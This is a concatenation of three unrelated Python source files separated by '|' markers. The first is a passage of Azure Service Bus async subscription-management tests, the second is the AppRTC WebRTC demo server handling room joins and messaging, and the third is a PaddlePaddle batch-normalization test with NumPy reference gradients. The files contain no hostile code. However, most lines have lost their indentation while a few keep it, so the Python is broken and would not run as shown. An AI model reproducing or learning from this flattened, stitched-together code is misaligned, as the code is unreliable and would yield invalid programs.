subs_infos = await async_pageable_to_list(mgmt_service.list_subscriptions_runtime_properties(topic_name))
assert len(subs) == 1 and len(subs_infos) == 1
assert subs[0].name == subs_infos[0].name == subscription_name
info = subs_infos[0]
assert info.accessed_at_utc is not None
assert info.updated_at_utc is not None
assert info.created_at_utc is not None
assert info.total_message_count == 0
assert info.active_message_count == 0
assert info.dead_letter_message_count == 0
assert info.transfer_dead_letter_message_count == 0
assert info.transfer_message_count == 0
await mgmt_service.delete_subscription(topic_name, subscription_name)
subs_infos = await async_pageable_to_list(mgmt_service.list_subscriptions_runtime_properties(topic_name))
assert len(subs_infos) == 0
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_get_runtime_properties_basic(self, servicebus_namespace_connection_string):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = 'dcvxqa'
subscription_name = 'xvazzag'
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(topic_name, subscription_name)
sub_runtime_properties = await mgmt_service.get_subscription_runtime_properties(topic_name, subscription_name)
assert sub_runtime_properties
assert sub_runtime_properties.name == subscription_name
assert sub_runtime_properties.created_at_utc is not None
assert sub_runtime_properties.accessed_at_utc is not None
assert sub_runtime_properties.updated_at_utc is not None
assert sub_runtime_properties.total_message_count == 0
assert sub_runtime_properties.active_message_count == 0
assert sub_runtime_properties.dead_letter_message_count == 0
assert sub_runtime_properties.transfer_dead_letter_message_count == 0
assert sub_runtime_properties.transfer_message_count == 0
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_mgmt_subscription_async_update_dict_success(self, servicebus_namespace_connection_string, servicebus_namespace, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "fjrui"
subscription_name = "eqkovc"
try:
topic_description = await mgmt_service.create_topic(topic_name)
subscription_description = await mgmt_service.create_subscription(topic_description.name, subscription_name)
subscription_description_dict = dict(subscription_description)
# Try updating one setting.
subscription_description_dict["lock_duration"] = datetime.timedelta(minutes=2)
await mgmt_service.update_subscription(topic_description.name, subscription_description_dict)
subscription_description = await mgmt_service.get_subscription(topic_name, subscription_name)
assert subscription_description.lock_duration == datetime.timedelta(minutes=2)
# Now try updating all settings.
subscription_description_dict = dict(subscription_description)
subscription_description_dict["auto_delete_on_idle"] = datetime.timedelta(minutes=10)
subscription_description_dict["dead_lettering_on_message_expiration"] = True
subscription_description_dict["default_message_time_to_live"] = datetime.timedelta(minutes=11)
subscription_description_dict["lock_duration"] = datetime.timedelta(seconds=12)
subscription_description_dict["max_delivery_count"] = 14
# topic_description.enable_partitioning = True # Cannot be changed after creation
# topic_description.requires_session = True # Cannot be changed after creation
await mgmt_service.update_subscription(topic_description.name, subscription_description_dict)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=10)
assert subscription_description.dead_lettering_on_message_expiration == True
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=11)
assert subscription_description.max_delivery_count == 14
assert subscription_description.lock_duration == datetime.timedelta(seconds=12)
# assert topic_description.enable_partitioning == True
# assert topic_description.requires_session == True
# Finally, test forward_to (separately, as it changes auto_delete_on_idle when you enable it.)
subscription_description_dict = dict(subscription_description)
subscription_description_dict["forward_to"] = "sb://{}.servicebus.windows.net/{}".format(servicebus_namespace.name, topic_name)
subscription_description_dict["forward_dead_lettered_messages_to"] = "sb://{}.servicebus.windows.net/{}".format(servicebus_namespace.name, topic_name)
await mgmt_service.update_subscription(topic_description.name, subscription_description_dict)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
            # Note: we use endswith because the servicebus_namespace_name is replaced locally but not in the properties bag; the suffix check still validates this.
assert subscription_description.forward_to.endswith(".servicebus.windows.net/{}".format(topic_name))
assert subscription_description.forward_dead_lettered_messages_to.endswith(".servicebus.windows.net/{}".format(topic_name))
# updating all settings with keyword arguments.
await mgmt_service.update_subscription(
topic_description.name,
dict(subscription_description),
auto_delete_on_idle=datetime.timedelta(minutes=15),
dead_lettering_on_message_expiration=False,
default_message_time_to_live=datetime.timedelta(minutes=16),
lock_duration=datetime.timedelta(seconds=17),
max_delivery_count=15,
forward_to=None,
forward_dead_lettered_messages_to=None
)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=15)
assert subscription_description.dead_lettering_on_message_expiration == False
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=16)
assert subscription_description.max_delivery_count == 15
assert subscription_description.lock_duration == datetime.timedelta(seconds=17)
            assert subscription_description.forward_to is None
            assert subscription_description.forward_dead_lettered_messages_to is None
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
await mgmt_service.close()
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_mgmt_subscription_async_update_dict_error(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "fjrui"
subscription_name = "eqkovc"
try:
topic_description = await mgmt_service.create_topic(topic_name)
subscription_description = await mgmt_service.create_subscription(topic_description.name, subscription_name)
# send in subscription dict without non-name keyword args
            subscription_description_only_name = {"name": subscription_name}
with pytest.raises(TypeError):
await mgmt_service.update_subscription(topic_description.name, subscription_description_only_name)
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
|
|
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
"""WebRTC Demo
This module demonstrates the WebRTC API by implementing a simple video chat app.
"""
import cgi
import json
import logging
import os
import random
import threading
import jinja2
import webapp2
from google.appengine.api import memcache
from google.appengine.api import urlfetch
import analytics
import analytics_page
import compute_page
import constants
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
def generate_random(length):
word = ''
for _ in range(length):
word += random.choice('0123456789')
return word
# HD is on by default for desktop Chrome, but not Android or Firefox (yet)
def get_hd_default(user_agent):
  if 'Android' in user_agent or 'Chrome' not in user_agent:
return 'false'
return 'true'
# iceServers will be filled in by the TURN HTTP request.
def make_pc_config(ice_transports):
config = {
'iceServers': [],
'bundlePolicy': 'max-bundle',
'rtcpMuxPolicy': 'require'
  }
if ice_transports:
config['iceTransports'] = ice_transports
return config
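# Example (hypothetical argument): make_pc_config('relay') returns
# {'iceServers': [], 'bundlePolicy': 'max-bundle',
#  'rtcpMuxPolicy': 'require', 'iceTransports': 'relay'}.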
def add_media_track_constraint(track_constraints, constraint_string):
tokens = constraint_string.split(':')
mandatory = True
if len(tokens) == 2:
# If specified, e.g. mandatory:minHeight=720, set mandatory appropriately.
mandatory = (tokens[0] == 'mandatory')
else:
# Otherwise, default to mandatory, except for goog constraints, which
# won't work in other browsers.
mandatory = not tokens[0].startswith('goog')
tokens = tokens[-1].split('=')
if len(tokens) == 2:
if mandatory:
track_constraints['mandatory'][tokens[0]] = tokens[1]
else:
track_constraints['optional'].append({tokens[0]: tokens[1]})
else:
logging.error('Ignoring malformed constraint: ' + constraint_string)
def make_media_track_constraints(constraints_string):
if not constraints_string or constraints_string.lower() == 'true':
track_constraints = True
elif constraints_string.lower() == 'false':
track_constraints = False
else:
track_constraints = {'mandatory': {}, 'optional': []}
for constraint_string in constraints_string.split(','):
add_media_track_constraint(track_constraints, constraint_string)
return track_constraints
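# Example (hypothetical input): make_media_track_constraints(
#     'minWidth=1280,googNoiseReduction=true') yields
# {'mandatory': {'minWidth': '1280'},
#  'optional': [{'googNoiseReduction': 'true'}]}:
# plain keys default to mandatory, goog* keys to optional.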
def make_media_stream_constraints(audio, video, firefox_fake_device):
stream_constraints = (
{'audio': make_media_track_constraints(audio),
'video': make_media_track_constraints(video)})
if firefox_fake_device:
stream_constraints['fake'] = True
logging.info('Applying media constraints: ' + str(stream_constraints))
return stream_constraints
def maybe_add_constraint(constraints, param, constraint):
  if param.lower() == 'true':
    constraints['optional'].append({constraint: True})
  elif param.lower() == 'false':
    constraints['optional'].append({constraint: False})
return constraints
def make_pc_constraints(dtls, dscp, ipv6):
  constraints = {'optional': []}
maybe_add_constraint(constraints, dtls, 'DtlsSrtpKeyAgreement')
maybe_add_constraint(constraints, dscp, 'googDscp')
maybe_add_constraint(constraints, ipv6, 'googIPv6')
return constraints
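# Example: make_pc_constraints('true', 'false', '') yields
# {'optional': [{'DtlsSrtpKeyAgreement': True}, {'googDscp': False}]};
# ipv6 is left unset because '' matches neither 'true' nor 'false'.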
def append_url_arguments(request, link):
arguments = request.arguments()
if len(arguments) == 0:
return link
link += ('?' + cgi.escape(arguments[0], True) + '=' +
cgi.escape(request.get(arguments[0]), True))
for argument in arguments[1:]:
link += ('&' + cgi.escape(argument, True) + '=' +
cgi.escape(request.get(argument), True))
return link
def get_wss_parameters(request):
wss_host_port_pair = request.get('wshpp')
wss_tls = request.get('wstls')
if not wss_host_port_pair:
# Attempt to get a wss server from the status provided by prober,
# if that fails, use fallback value.
memcache_client = memcache.Client()
wss_active_host = memcache_client.get(constants.WSS_HOST_ACTIVE_HOST_KEY)
if wss_active_host in constants.WSS_HOST_PORT_PAIRS:
wss_host_port_pair = wss_active_host
else:
logging.warning(
'Invalid or no value returned from memcache, using fallback: '
+ json.dumps(wss_active_host))
wss_host_port_pair = constants.WSS_HOST_PORT_PAIRS[0]
if wss_tls and wss_tls == 'false':
wss_url = 'ws://' + wss_host_port_pair + '/ws'
wss_post_url = 'http://' + wss_host_port_pair
else:
wss_url = 'wss://' + wss_host_port_pair + '/ws'
wss_post_url = 'https://' + wss_host_port_pair
return (wss_url, wss_post_url)
def get_version_info():
  try:
    path = os.path.join(os.path.dirname(__file__), 'version_info.json')
    with open(path) as f:
      return json.load(f)
  except ValueError as e:
    logging.warning('version_info.json cannot be decoded: ' + str(e))
  except IOError as e:
    logging.info('version_info.json cannot be opened: ' + str(e))
  return None
def get_callstats_params():
  try:
    path = os.path.join(os.path.dirname(__file__), 'callstats_params.json')
    with open(path) as f:
      return json.load(f)
  except ValueError as e:
    logging.warning('callstats_params.json cannot be decoded: ' + str(e))
  except IOError as e:
    logging.info('callstats_params.json cannot be opened: ' + str(e))
  return None
# Returns appropriate room parameters based on query parameters in the request.
# TODO(tkchin): move query parameter parsing to JS code.
def get_room_parameters(request, room_id, client_id, is_initiator):
error_messages = []
warning_messages = []
# Get the base url without arguments.
base_url = request.path_url
user_agent = request.headers['User-Agent']
# HTML or JSON.
response_type = request.get('t')
# Which ICE candidates to allow. This is useful for forcing a call to run
# over TURN, by setting it=relay.
ice_transports = request.get('it')
# Which ICE server transport= to allow (i.e., only TURN URLs with
# transport=<tt> will be used). This is useful for forcing a session to use
# TURN/TCP, by setting it=relay&tt=tcp.
ice_server_transports = request.get('tt')
# A HTTP server that will be used to find the right ICE servers to use, as
# described in http://tools.ietf.org/html/draft-uberti-rtcweb-turn-rest-00.
ice_server_base_url = request.get('ts', default_value =
constants.ICE_SERVER_BASE_URL)
# Use "audio" and "video" to set the media stream constraints. Defined here:
# http://goo.gl/V7cZg
#
# "true" and "false" are recognized and interpreted as bools, for example:
# "?audio=true&video=false" (Start an audio-only call.)
# "?audio=false" (Start a video-only call.)
# If unspecified, the stream constraint defaults to True.
#
# To specify media track constraints, pass in a comma-separated list of
# key/value pairs, separated by a "=". Examples:
# "?audio=googEchoCancellation=false,googAutoGainControl=true"
# (Disable echo cancellation and enable gain control.)
#
# "?video=minWidth=1280,minHeight=720,googNoiseReduction=true"
# (Set the minimum resolution to 1280x720 and enable noise reduction.)
#
# Keys starting with "goog" will be added to the "optional" key; all others
# will be added to the "mandatory" key.
# To override this default behavior, add a "mandatory" or "optional" prefix
# to each key, e.g.
# "?video=optional:minWidth=1280,optional:minHeight=720,
# mandatory:googNoiseReduction=true"
# (Try to do 1280x720, but be willing to live with less; enable
# noise reduction or die trying.)
#
# The audio keys are defined here: talk/app/webrtc/localaudiosource.cc
# The video keys are defined here: talk/app/webrtc/videosource.cc
audio = request.get('audio')
video = request.get('video')
# Pass firefox_fake_device=1 to pass fake: true in the media constraints,
# which will make Firefox use its built-in fake device.
firefox_fake_device = request.get('firefox_fake_device')
# The hd parameter is a shorthand to determine whether to open the
# camera at 720p. If no value is provided, use a platform-specific default.
# When defaulting to HD, use optional constraints, in case the camera
# doesn't actually support HD modes.
hd = request.get('hd').lower()
if hd and video:
message = 'The "hd" parameter has overridden video=' + video
logging.warning(message)
# HTML template is UTF-8, make sure the string is UTF-8 as well.
warning_messages.append(message.encode('utf-8'))
if hd == 'true':
video = 'mandatory:minWidth=1280,mandatory:minHeight=720'
elif not hd and not video and get_hd_default(user_agent) == 'true':
video = 'optional:minWidth=1280,optional:minHeight=720'
if request.get('minre') or request.get('maxre'):
message = ('The "minre" and "maxre" parameters are no longer ' +
'supported. Use "video" instead.')
logging.warning(message)
# HTML template is UTF-8, make sure the string is UTF-8 as well.
warning_messages.append(message.encode('utf-8'))
# Options for controlling various networking features.
dtls = request.get('dtls')
dscp = request.get('dscp')
ipv6 = request.get('ipv6')
debug = request.get('debug')
if debug == 'loopback':
# Set dtls to false as DTLS does not work for loopback.
dtls = 'false'
include_loopback_js = '<script src="/js/loopback.js"></script>'
else:
include_loopback_js = ''
# TODO(tkchin): We want to provide a ICE request url on the initial get,
# but we don't provide client_id until a join. For now just generate
# a random id, but we should make this better.
username = client_id if client_id is not None else generate_random(9)
if len(ice_server_base_url) > 0:
ice_server_url = constants.ICE_SERVER_URL_TEMPLATE % \
(ice_server_base_url, constants.ICE_SERVER_API_KEY)
else:
    ice_server_url = ''
turn_url = constants.TURN_URL_TEMPLATE % \
(constants.TURN_BASE_URL, username, constants.CEOD_KEY)
pc_config = make_pc_config(ice_transports)
pc_constraints = make_pc_constraints(dtls, dscp, ipv6)
  offer_options = {}
media_constraints = make_media_stream_constraints(audio, video,
firefox_fake_device)
wss_url, wss_post_url = get_wss_parameters(request)
bypass_join_confirmation = 'BYPASS_JOIN_CONFIRMATION' in os.environ and \
os.environ['BYPASS_JOIN_CONFIRMATION'] == 'True'
params = {
'error_messages': error_messages,
'warning_messages': warning_messages,
'is_loopback' : json.dumps(debug == 'loopback'),
'pc_config': json.dumps(pc_config),
'pc_constraints': json.dumps(pc_constraints),
'offer_options': json.dumps(offer_options),
'media_constraints': json.dumps(media_constraints),
'turn_url': turn_url,
'ice_server_url': ice_server_url,
'ice_server_transports': ice_server_transports,
'include_loopback_js' : include_loopback_js,
'wss_url': wss_url,
'wss_post_url': wss_post_url,
'bypass_join_confirmation': json.dumps(bypass_join_confirmation),
'version_info': json.dumps(get_version_info()),
'callstats_params': json.dumps(constants.CALLSTATS_PARAMS)
}
if room_id is not None:
room_link = request.host_url + '/r/' + room_id
room_link = append_url_arguments(request, room_link)
params['room_id'] = room_id
params['room_link'] = room_link
if client_id is not None:
params['client_id'] = client_id
if is_initiator is not None:
params['is_initiator'] = json.dumps(is_initiator)
return params
# For now, (room_id, client_id) pairs are 'unique' but client_ids are not.
# Uniqueness is not enforced, however, and bad things may happen if the RNG
# generates non-unique numbers. We also have a special loopback client id.
# TODO(tkchin): Generate room/client IDs in a unique way while handling
# loopback scenario correctly.
class Client:
def __init__(self, is_initiator):
self.is_initiator = is_initiator
self.messages = []
def add_message(self, msg):
self.messages.append(msg)
def clear_messages(self):
self.messages = []
def set_initiator(self, initiator):
self.is_initiator = initiator
def __str__(self):
return '{%r, %d}' % (self.is_initiator, len(self.messages))
class Room:
def __init__(self):
self.clients = {}
def add_client(self, client_id, client):
self.clients[client_id] = client
def remove_client(self, client_id):
del self.clients[client_id]
def get_occupancy(self):
return len(self.clients)
def has_client(self, client_id):
return client_id in self.clients
def get_client(self, client_id):
return self.clients[client_id]
def get_other_client(self, client_id):
for key, client in self.clients.items():
      if key != client_id:
return client
return None
def __str__(self):
return str(self.clients.keys())
def get_memcache_key_for_room(host, room_id):
return '%s/%s' % (host, room_id)
def add_client_to_room(request, room_id, client_id, is_loopback):
key = get_memcache_key_for_room(request.host_url, room_id)
memcache_client = memcache.Client()
error = None
retries = 0
room = None
# Compare and set retry loop.
while True:
is_initiator = None
messages = []
room_state = ''
room = memcache_client.gets(key)
if room is None:
# 'set' and another 'gets' are needed for CAS to work.
if not memcache_client.set(key, Room()):
logging.warning('memcache.Client.set failed for key ' + key)
error = constants.RESPONSE_ERROR
break
room = memcache_client.gets(key)
occupancy = room.get_occupancy()
if occupancy >= 2:
error = constants.RESPONSE_ROOM_FULL
break
if room.has_client(client_id):
error = constants.RESPONSE_DUPLICATE_CLIENT
break
if occupancy == 0:
is_initiator = True
room.add_client(client_id, Client(is_initiator))
if is_loopback:
room.add_client(constants.LOOPBACK_CLIENT_ID, Client(False))
else:
is_initiator = False
other_client = room.get_other_client(client_id)
messages = other_client.messages
room.add_client(client_id, Client(is_initiator))
other_client.clear_messages()
if memcache_client.cas(key, room, constants.ROOM_MEMCACHE_EXPIRATION_SEC):
logging.info('Added client %s in room %s, retries = %d' \
%(client_id, room_id, retries))
if room.get_occupancy() == 2:
analytics.report_event(analytics.EventType.ROOM_SIZE_2,
room_id,
host=request.host)
success = True
break
else:
retries = retries + 1
return {'error': error, 'is_initiator': is_initiator,
'messages': messages, 'room_state': str(room)}
def remove_client_from_room(host, room_id, client_id):
key = get_memcache_key_for_room(host, room_id)
memcache_client = memcache.Client()
retries = 0
# Compare and set retry loop.
while True:
room = memcache_client.gets(key)
if room is None:
logging.warning('remove_client_from_room: Unknown room ' + room_id)
return {'error': constants.RESPONSE_UNKNOWN_ROOM, 'room_state': None}
if not room.has_client(client_id):
logging.warning('remove_client_from_room: Unknown client ' + client_id + \
' for room ' + room_id)
return {'error': constants.RESPONSE_UNKNOWN_CLIENT, 'room_state': None}
room.remove_client(client_id)
if room.has_client(constants.LOOPBACK_CLIENT_ID):
room.remove_client(constants.LOOPBACK_CLIENT_ID)
if room.get_occupancy() > 0:
room.get_other_client(client_id).set_initiator(True)
else:
room = None
if memcache_client.cas(key, room, constants.ROOM_MEMCACHE_EXPIRATION_SEC):
logging.info('Removed client %s from room %s, retries=%d' \
%(client_id, room_id, retries))
return {'error': None, 'room_state': str(room)}
retries = retries + 1
def save_message_from_client(host, room_id, client_id, message):
text = None
try:
text = message.encode(encoding='utf-8', errors='strict')
except Exception as e:
return {'error': constants.RESPONSE_ERROR, 'saved': False}
key = get_memcache_key_for_room(host, room_id)
memcache_client = memcache.Client()
retries = 0
# Compare and set retry loop.
while True:
room = memcache_client.gets(key)
if room is None:
logging.warning('Unknown room: ' + room_id)
return {'error': constants.RESPONSE_UNKNOWN_ROOM, 'saved': False}
if not room.has_client(client_id):
logging.warning('Unknown client: ' + client_id)
return {'error': constants.RESPONSE_UNKNOWN_CLIENT, 'saved': False}
if room.get_occupancy() > 1:
return {'error': None, 'saved': False}
client = room.get_client(client_id)
client.add_message(text)
if memcache_client.cas(key, room, constants.ROOM_MEMCACHE_EXPIRATION_SEC):
logging.info('Saved message for client %s:%s in room %s, retries=%d' \
%(client_id, str(client), room_id, retries))
return {'error': None, 'saved': True}
retries = retries + 1
class LeavePage(webapp2.RequestHandler):
def post(self, room_id, client_id):
result = remove_client_from_room(
self.request.host_url, room_id, client_id)
if result['error'] is None:
logging.info('Room ' + room_id + ' has state ' + result['room_state'])
class MessagePage(webapp2.RequestHandler):
def write_response(self, result):
content = json.dumps({ 'result' : result })
self.response.write(content)
def send_message_to_collider(self, room_id, client_id, message):
logging.info('Forwarding message to collider for room ' + room_id +
' client ' + client_id)
wss_url, wss_post_url = get_wss_parameters(self.request)
url = wss_post_url + '/' + room_id + '/' + client_id
result = urlfetch.fetch(url=url,
payload=message,
method=urlfetch.POST)
if result.status_code != 200:
logging.error(
'Failed to send message to collider: %d' % (result.status_code))
# TODO(tkchin): better error handling.
self.error(500)
return
self.write_response(constants.RESPONSE_SUCCESS)
def post(self, room_id, client_id):
message_json = self.request.body
result = save_message_from_client(
self.request.host_url, room_id, client_id, message_json)
if result['error'] is not None:
self.write_response(result['error'])
return
if not result['saved']:
# Other client joined, forward to collider. Do this outside the lock.
# Note: this may fail in local dev server due to not having the right
# certificate file locally for SSL validation.
# Note: loopback scenario follows this code path.
# TODO(tkchin): consider async fetch here.
self.send_message_to_collider(room_id, client_id, message_json)
else:
self.write_response(constants.RESPONSE_SUCCESS)
class JoinPage(webapp2.RequestHandler):
def write_response(self, result, params, messages):
# TODO(tkchin): Clean up response format. For simplicity put everything in
# params for now.
params['messages'] = messages
self.response.write(json.dumps({
'result': result,
'params': params
}))
def write_room_parameters(self, room_id, client_id, messages, is_initiator):
params = get_room_parameters(self.request, room_id, client_id, is_initiator)
self.write_response('SUCCESS', params, messages)
def post(self, room_id):
client_id = generate_random(8)
is_loopback = self.request.get('debug') == 'loopback'
result = add_client_to_room(self.request, room_id, client_id, is_loopback)
if result['error'] is not None:
logging.info('Error adding client to room: ' + result['error'] + \
', room_state=' + result['room_state'])
self.write_response(result['error'], {}, [])
return
self.write_room_parameters(
room_id, client_id, result['messages'], result['is_initiator'])
logging.info('User ' + client_id + ' joined room ' + room_id)
logging.info('Room ' + room_id + ' has state ' + result['room_state'])
class MainPage(webapp2.RequestHandler):
  def write_response(self, target_page, params=None):
    template = jinja_environment.get_template(target_page)
    content = template.render(params or {})
self.response.out.write(content)
def get(self):
"""Renders index.html."""
    if self.request.headers['Host'] == 'apprtc.net':
      return self.redirect('https://www.apprtc.net', permanent=True)
# Parse out parameters from request.
params = get_room_parameters(self.request, None, None, None)
# room_id/room_link will not be included in the returned parameters
# so the client will show the landing page for room selection.
self.write_response('index_template.html', params)
class RoomPage(webapp2.RequestHandler):
  def write_response(self, target_page, params=None):
    template = jinja_environment.get_template(target_page)
    content = template.render(params or {})
self.response.out.write(content)
def get(self, room_id):
"""Renders index.html or full.html."""
# Check if room is full.
room = memcache.get(
get_memcache_key_for_room(self.request.host_url, room_id))
if room is not None:
logging.info('Room ' + room_id + ' has state ' + str(room))
if room.get_occupancy() >= 2:
logging.info('Room ' + room_id + ' is full')
self.write_response('full_template.html')
return
# Parse out room parameters from request.
params = get_room_parameters(self.request, room_id, None, None)
# room_id/room_link will be included in the returned parameters
# so the client will launch the requested room.
self.write_response('index_template.html', params)
class ParamsPage(webapp2.RequestHandler):
def get(self):
# Return room independent room parameters.
params = get_room_parameters(self.request, None, None, None)
self.response.write(json.dumps(params))
app = webapp2.WSGIApplication([
('/', MainPage),
('/a/', analytics_page.AnalyticsPage),
('/compute/(\w+)/(\S+)/(\S+)', compute_page.ComputePage),
('/join/([a-zA-Z0-9-_]+)', JoinPage),
('/leave/([a-zA-Z0-9-_]+)/([a-zA-Z0-9-_]+)', LeavePage),
('/message/([a-zA-Z0-9-_]+)/([a-zA-Z0-9-_]+)', MessagePage),
('/params', ParamsPage),
('/r/([a-zA-Z0-9-_]+)', RoomPage),
], debug=True)
|
|
import unittest
import numpy as np
from op_test import OpTest
import paddle.v2.framework.core as core
from paddle.v2.framework.op import Operator
def grad_var_name(var_name):
return var_name + "@GRAD"
def get_backward_op(scope, op, no_grad_set):
backward_op = core.Operator.backward(op, no_grad_set)
for input in backward_op.input_vars():
var = scope.var(input)
var.get_tensor()
for output in backward_op.output_vars():
var = scope.var(output)
var.get_tensor()
return backward_op
def _reference_training(x, scale, offset, epsilon, data_format):
if data_format == "NCHW":
n, c, h, w = x.shape
x_square = x * x
x_square_sum = np.sum(x_square, (0, 2, 3))
x_sum = np.sum(x, axis=(0, 2, 3))
element_count = np.size(x) / int(np.shape(x)[1])
mean = x_sum / element_count
var = x_square_sum / element_count - mean * mean
mean_tile = np.reshape(mean, (1, c, 1, 1))
mean_tile = np.tile(mean_tile, (n, 1, h, w))
var_tile = np.reshape(var, (1, c, 1, 1))
var_tile = np.tile(var_tile, (n, 1, h, w))
normalized = (x - mean_tile) / np.sqrt(var_tile + epsilon)
scale_tile = np.reshape(scale, (1, c, 1, 1))
scale_tile = np.tile(scale_tile, (n, 1, h, w))
offset_tile = np.reshape(offset, (1, c, 1, 1))
        offset_tile = np.tile(offset_tile, (n, 1, h, w))
y = normalized * scale_tile + offset_tile
return y, mean, var
elif data_format == "NHWC":
x_square = x * x
x_square_sum = np.sum(x_square, (0, 1, 2))
x_sum = np.sum(x, axis=(0, 1, 2))
element_count = np.size(x) / int(np.shape(x)[-1])
mean = x_sum / element_count
var = x_square_sum / element_count - mean * mean
normalized = (x - mean) / np.sqrt(var + epsilon)
return (normalized * scale + offset), mean, var
else:
raise ValueError("Unknown data order.")
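# Sanity check (sketch): for a constant input the batch variance is zero, so
# normalized == 0 and y == offset, e.g.
#     y, mean, var = _reference_training(np.ones((2, 3, 4, 2), np.float32),
#                                        np.ones(2), np.zeros(2), 1e-5, "NHWC")
# gives var == 0 and y == 0 everywhere (the offset is zero here).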
def _reference_grad(x, grad_y, scale, mean, var, epsilon, data_format):
# Use the following formulas to calculate gradients:
# grad_scale =
# sum(grad_y * (x - mean)) * rsqrt(var + epsilon)
#
# grad_offset = sum(output_y)
#
# grad_x =
# 1/N * scale * rsqrt(var + epsilon) * (N * grad_y - sum(grad_y) -
# (x - mean) * sum(grad_y * (x - mean)) / (var + epsilon))
# transfer from (N, C, H, W) to (N, H, W, C) to simplify computation
if data_format == "NCHW":
x = np.transpose(x, (0, 2, 3, 1))
grad_y = np.transpose(grad_y, (0, 2, 3, 1))
# raise ValueError("data_format must be NHWC, got %s." % data_format)
grad_x = scale * (grad_y - np.mean(
grad_y, axis=(0, 1, 2)) - (x - mean) * np.mean(
grad_y * (x - mean), axis=(0, 1, 2)) /
(var + epsilon)) / np.sqrt(var + epsilon)
grad_scale = np.sum(grad_y * (x - mean) / np.sqrt(var + epsilon),
axis=(0, 1, 2))
grad_offset = np.sum(grad_y, axis=(0, 1, 2))
# transfer back to N, C, H, W
if data_format == "NCHW":
grad_x = np.transpose(grad_x, (0, 3, 1, 2))
x = np.transpose(x, (0, 3, 1, 2))
grad_y = np.transpose(grad_y, (0, 3, 1, 2))
return grad_x, grad_scale, grad_offset
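def _finite_difference_check_sketch():
    # Sketch only (not invoked by the tests below): verify the offset
    # gradient from _reference_grad against a central finite difference of
    # the forward pass. Assumes NHWC data; shapes and names are illustrative.
    epsilon, delta = 1e-5, 1e-3
    x = np.random.random_sample((2, 3, 4, 2)).astype(np.float64)
    scale = np.random.random_sample(2).astype(np.float64)
    offset = np.random.random_sample(2).astype(np.float64)
    grad_y = np.random.random_sample(x.shape).astype(np.float64)
    _, mean, var = _reference_training(x, scale, offset, epsilon, "NHWC")
    _, _, grad_offset = _reference_grad(x, grad_y, scale, mean, var,
                                        epsilon, "NHWC")
    for c in range(2):
        step = np.zeros_like(offset)
        step[c] = delta
        y_hi, _, _ = _reference_training(x, scale, offset + step, epsilon,
                                         "NHWC")
        y_lo, _, _ = _reference_training(x, scale, offset - step, epsilon,
                                         "NHWC")
        # d(sum(grad_y * y))/d(offset[c]) should equal grad_offset[c].
        numeric = np.sum(grad_y * (y_hi - y_lo)) / (2. * delta)
        assert abs(numeric - grad_offset[c]) < 1e-3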
def create_or_get_tensor(scope, var_name, var, place):
tensor = scope.var(var_name).get_tensor()
if var is not None:
assert isinstance(var, np.ndarray)
tensor.set_lod([[]])
tensor.set_dims(var.shape)
tensor.set(var, place)
return tensor
def set_output_grad(scope, outputs, place, feed_dict=None):
def __set_tensor__(name, data=None):
out_tensor = scope.find_var(name).get_tensor()
grad_tensor = scope.var(grad_var_name(name)).get_tensor()
out_dtype = out_tensor.dtype()
if data is None:
if out_dtype == core.DataType.FP64:
data = np.ones(out_tensor.shape(), dtype=np.float64)
elif out_dtype == core.DataType.FP32:
data = np.ones(out_tensor.shape(), dtype=np.float32)
else:
raise ValueError("Not supported data type " + str(out_dtype))
grad_tensor.set(data, place)
for output in outputs:
data = None
        if feed_dict is not None and output in feed_dict:
data = feed_dict[output]
__set_tensor__(output, data)
class TestBatchNormOp(OpTest):
def __assert_close(self, tensor, np_array, msg, atol=1e-4):
self.assertTrue(np.allclose(np.array(tensor), np_array, atol=atol), msg)
def test_python(self):
data_format = "NHWC"
epsilon = 0.00001
momentum = 0.9
# N, H, W, C: 2, 3, 4, 2
n, h, w, c = 2, 3, 4, 2
x_shape = [n, h, w, c]
scale_shape = [c]
x_val = np.random.random_sample(x_shape).astype(np.float32)
scale_val = np.random.random_sample(scale_shape).astype(np.float32)
bias_val = np.random.random_sample(scale_shape).astype(np.float32)
mean = np.zeros(scale_shape).astype(np.float32)
variance = np.ones(scale_shape).astype(np.float32)
# run forward
y_out, saved_mean, var_ref = _reference_training(
x_val, scale_val, bias_val, epsilon, "NHWC")
#
mean_out = saved_mean * (1. - momentum) + momentum * mean
variance_out = var_ref * (1. - momentum) + momentum * variance
saved_variance = 1. / np.sqrt(var_ref + epsilon)
# running N, C, H, W case
# should produce the same results
x_shape2 = [n, c, h, w]
x_val2 = np.transpose(x_val, (0, 3, 1, 2))
y_out2, saved_mean2, var_ref2 = _reference_training(
x_val2, scale_val, bias_val, epsilon, "NCHW")
self.__assert_close(saved_mean, saved_mean2, "batch mean")
self.__assert_close(var_ref, var_ref2, "batch variance")
# transfer (N, C, H, W) back to (N, H, W, C)
y_out2_trans = np.transpose(y_out2, (0, 2, 3, 1))
